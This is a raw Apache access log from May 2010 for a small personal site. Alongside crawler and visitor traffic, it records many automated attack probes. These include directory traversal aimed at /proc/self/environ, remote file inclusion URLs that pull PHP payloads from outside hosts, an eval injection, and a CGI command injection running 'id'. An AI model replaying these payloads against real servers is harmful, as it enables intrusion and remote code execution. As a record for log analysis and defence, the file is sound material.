207.45.186.2 - - [14/May/2010:21:55:17 -0500] "GET /logs/access_log.1273276800////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.833"
207.45.186.2 - - [14/May/2010:21:55:17 -0500] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.833"
207.45.186.2 - - [14/May/2010:21:55:17 -0500] "GET /logs/access_log.1273276800////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.833"
207.45.186.2 - - [14/May/2010:21:55:17 -0500] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.833"
207.45.186.2 - - [14/May/2010:21:55:17 -0500] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.833"
207.45.186.2 - - [14/May/2010:21:55:17 -0500] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.833"
87.250.255.243 - - [14/May/2010:21:57:47 -0500] "GET /logs/access_log.1236384000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
204.15.190.163 - - [14/May/2010:21:58:39 -0500] "GET //mcf.php?content=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""libwww-perl/5.813"
67.195.112.180 - - [14/May/2010:22:04:11 -0500] "GET /logs/access_log.1193184000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.41 - - [14/May/2010:22:05:39 -0500] "GET /logs/access_log.1262044800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [14/May/2010:22:06:57 -0500] "GET /logs/access_log.1226275200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.42 - - [14/May/2010:22:08:39 -0500] "GET /logs/access_log.1189296000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.21.79.214 - - [14/May/2010:22:08:44 -0500] "GET /logs/access_log.1273017600/main.cgi?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt%7Cecho%20v0pCr3w%3Bid%7C HTTP/1.1" 404 319 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [14/May/2010:22:08:44 -0500] "GET /main.cgi?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt%7Cecho%20v0pCr3w%3Bid%7C HTTP/1.1" 404 292 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [14/May/2010:22:08:45 -0500] "GET /logs/main.cgi?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt%7Cecho%20v0pCr3w%3Bid%7C HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.192.220.100 - - [14/May/2010:22:09:17 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
173.192.220.100 - - [14/May/2010:22:09:17 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
67.195.112.180 - - [14/May/2010:22:09:49 -0500] "GET /logs/access_log.1186704000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.129.119.43 - - [14/May/2010:22:09:58 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.204.236 - - [14/May/2010:22:10:10 -0500] "GET /logs/access_log.1232409600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
173.192.220.100 - - [14/May/2010:22:11:39 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
87.250.255.243 - - [14/May/2010:22:12:43 -0500] "GET /logs/access_log.1205798400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.235.124.57 - - [14/May/2010:22:14:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.57 - - [14/May/2010:22:14:36 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
204.15.190.163 - - [14/May/2010:22:17:53 -0500] "GET /logs/access_log.1273190400//mcf.php?content=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.813"
204.15.190.163 - - [14/May/2010:22:17:53 -0500] "GET //mcf.php?content=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""libwww-perl/5.813"
204.15.190.163 - - [14/May/2010:22:17:54 -0500] "GET /logs//mcf.php?content=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.813"
87.250.255.243 - - [14/May/2010:22:20:11 -0500] "GET /logs/access_log.1237680000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
173.192.220.100 - - [14/May/2010:22:23:45 -0500] "GET /logs/access_log.1273190400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.810"
173.192.220.100 - - [14/May/2010:22:23:45 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
173.192.220.100 - - [14/May/2010:22:23:45 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
87.250.255.243 - - [14/May/2010:22:24:53 -0500] "GET /logs/access_log.1259798400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
149.31.6.24 - - [14/May/2010:22:25:52 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.bella.li/tmp/file/id.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.823"
149.31.6.24 - - [14/May/2010:22:28:47 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.bella.li/tmp/file/id.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.823"
149.31.6.24 - - [14/May/2010:22:28:47 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.bella.li/tmp/file/id.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.823"
149.31.6.24 - - [14/May/2010:22:28:47 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.bella.li/tmp/file/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.823"
204.15.190.163 - - [14/May/2010:22:29:11 -0500] "GET /logs/access_log.1238803200//mcf.php?content=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.813"
149.31.6.24 - - [14/May/2010:22:30:18 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.bella.li/tmp/file/id.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.823"
87.250.255.243 - - [14/May/2010:22:30:38 -0500] "GET /logs/access_log.1252800000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.94 - - [14/May/2010:22:32:10 -0500] "GET /logs/access_log.1165881600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.224 - - [14/May/2010:22:36:11 -0500] "GET /logs/access_log.1221782400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [14/May/2010:22:39:50 -0500] "GET /logs/access_log.1243382400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [14/May/2010:22:45:09 -0500] "GET /costume/thmb3.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [14/May/2010:22:49:47 -0500] "GET /logs/access_log.1246406400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [14/May/2010:22:55:34 -0500] "GET /logs/access_log.1235692800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [14/May/2010:23:03:39 -0500] "GET /logs/access_log.1238544000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.99 - - [14/May/2010:23:03:39 -0500] "GET /logs/access_log.1168560000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.245.21.109 - - [14/May/2010:23:09:02 -0500] "GET //head.php?g4[path]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
207.46.199.43 - - [14/May/2010:23:09:09 -0500] "GET /logs/access_log.1163289600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.234 - - [14/May/2010:23:10:40 -0500] "GET /logs/access_log.1189468800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.223 - - [14/May/2010:23:11:39 -0500] "GET /logs/access_log.1201996800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.126.56.210 - - [14/May/2010:23:12:41 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.250.255.243 - - [14/May/2010:23:12:53 -0500] "GET /logs/access_log.1258070400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.126.56.210 - - [14/May/2010:23:13:15 -0500] "GET /logs/access_log.1273276800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:13:15 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:13:15 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:13:34 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
211.245.21.109 - - [14/May/2010:23:16:44 -0500] "GET /logs/access_log.1273363200//head.php?g4[path]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
211.245.21.109 - - [14/May/2010:23:16:45 -0500] "GET //head.php?g4[path]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
211.245.21.109 - - [14/May/2010:23:16:45 -0500] "GET /logs//head.php?g4[path]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:17:49 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.250.255.243 - - [14/May/2010:23:18:39 -0500] "GET /logs/access_log.1228262400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.126.56.210 - - [14/May/2010:23:20:18 -0500] "GET /logs/access_log.1273276800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:20:19 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:20:19 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:21:05 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.250.255.243 - - [14/May/2010:23:21:09 -0500] "GET /logs/access_log.1213660800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.55.146.200 - - [14/May/2010:23:23:44 -0500] "GET /logs/access_log.1212451200//cache/errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
72.55.146.200 - - [14/May/2010:23:23:44 -0500] "GET //cache/errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
72.55.146.200 - - [14/May/2010:23:23:44 -0500] "GET /logs//cache/errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
87.250.255.243 - - [14/May/2010:23:26:59 -0500] "GET /logs/access_log.1228780800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.101 - - [14/May/2010:23:32:09 -0500] "GET /logs/access_log.1201392000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.133.201.194 - - [14/May/2010:23:32:21 -0500] "GET /logs/access_log.1217376000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
174.133.201.194 - - [14/May/2010:23:32:22 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.133.201.194 - - [14/May/2010:23:32:24 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.133.201.194 - - [14/May/2010:23:32:42 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.133.201.194 - - [14/May/2010:23:32:42 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.133.201.194 - - [14/May/2010:23:32:44 -0500] "GET /logs/access_log.1217376000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.250.255.243 - - [14/May/2010:23:32:49 -0500] "GET /logs/access_log.1252454400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
206.125.73.198 - - [14/May/2010:23:35:08 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://www.google.com/search?hl=en&q=french+cuirassiers+costume&btnG=Search&aq=f&aqi=&aql=&oq=&gs_rfai=""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
207.126.56.210 - - [14/May/2010:23:35:43 -0500] "GET /logs/access_log.1273276800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:35:43 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:35:43 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:36:07 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:36:30 -0500] "GET /logs/access_log.1273190400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:36:30 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:36:30 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
206.125.73.198 - - [14/May/2010:23:36:53 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2227 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.125.73.198 - - [14/May/2010:23:36:53 -0500] "GET /costume/costume97%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.125.73.198 - - [14/May/2010:23:36:53 -0500] "GET /costume/costume99%20copy.JPG HTTP/1.1" 200 16783 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.125.73.198 - - [14/May/2010:23:36:53 -0500] "GET /costume/costume98%20copy.JPG HTTP/1.1" 200 16840 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.125.73.198 - - [14/May/2010:23:36:53 -0500] "GET /costume/costume101%20copy.JPG HTTP/1.1" 200 16134 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.125.73.198 - - [14/May/2010:23:36:53 -0500] "GET /costume/costume102%20copy.JPG HTTP/1.1" 200 14869 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.125.73.198 - - [14/May/2010:23:36:55 -0500] "GET /costume/costume104.JPG HTTP/1.1" 200 60508 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.125.73.198 - - [14/May/2010:23:36:55 -0500] "GET /costume/costume103%20copy.JPG HTTP/1.1" 200 16604 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
207.126.56.210 - - [14/May/2010:23:37:17 -0500] "GET /logs/access_log.1273276800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:37:18 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:37:18 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:38:13 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
207.126.56.210 - - [14/May/2010:23:39:24 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.250.255.243 - - [14/May/2010:23:40:57 -0500] "GET /logs/access_log.1202774400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
198.170.141.58 - - [14/May/2010:23:42:03 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
198.170.141.58 - - [14/May/2010:23:42:04 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
198.170.141.58 - - [14/May/2010:23:42:04 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.46.13.143 - - [14/May/2010:23:46:39 -0500] "GET /logs/access_log.1181865600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [14/May/2010:23:50:18 -0500] "GET /logs/access_log.1229990400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
198.170.141.58 - - [14/May/2010:23:50:55 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
207.46.204.186 - - [14/May/2010:23:54:09 -0500] "GET /logs/access_log.1207353600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [14/May/2010:23:57:17 -0500] "GET /logs/access_log.1236038400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.143 - - [15/May/2010:00:00:09 -0500] "GET /logs/access_log.1161302400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [15/May/2010:00:02:16 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.197 - - [15/May/2010:00:04:10 -0500] "GET /logs/access_log.1194652800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [15/May/2010:00:04:15 -0500] "GET /logs/access_log.1259539200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.133.201.194 - - [15/May/2010:00:05:09 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
174.133.201.194 - - [15/May/2010:00:05:09 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.133.201.194 - - [15/May/2010:00:05:11 -0500] "GET /logs/access_log.1272844800%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
174.133.201.194 - - [15/May/2010:00:08:39 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.133.201.194 - - [15/May/2010:00:08:42 -0500] "GET /logs/access_log.1272844800%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
174.133.201.194 - - [15/May/2010:00:08:42 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.190.102.21 - - [15/May/2010:00:09:28 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.190.102.21 - - [15/May/2010:00:09:28 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
121.190.102.21 - - [15/May/2010:00:09:28 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.204.186 - - [15/May/2010:00:13:39 -0500] "GET /logs/access_log.1232323200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.191 - - [15/May/2010:00:16:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.190.102.21 - - [15/May/2010:00:18:16 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.190.102.21 - - [15/May/2010:00:18:16 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.190.102.21 - - [15/May/2010:00:18:16 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
121.190.102.21 - - [15/May/2010:00:21:18 -0500] "GET /logs/access_log.1263340800//maillist/inc/initdb.php?absolute_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.190.102.21 - - [15/May/2010:00:21:18 -0500] "GET //maillist/inc/initdb.php?absolute_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.190.102.21 - - [15/May/2010:00:21:18 -0500] "GET /logs//maillist/inc/initdb.php?absolute_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
87.250.255.243 - - [15/May/2010:00:22:50 -0500] "GET /logs/access_log.1202342400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
77.211.140.224 - - [15/May/2010:00:22:56 -0500] "GET / HTTP/1.1" 200 1003 "-""Java/1.6.0_16"
72.30.142.216 - - [15/May/2010:00:25:25 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.55.146.200 - - [15/May/2010:00:27:03 -0500] "GET //cache/errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
72.55.146.200 - - [15/May/2010:00:27:03 -0500] "GET /logs//cache/errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
72.55.146.200 - - [15/May/2010:00:27:03 -0500] "GET /logs/access_log.1273190400//cache/errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
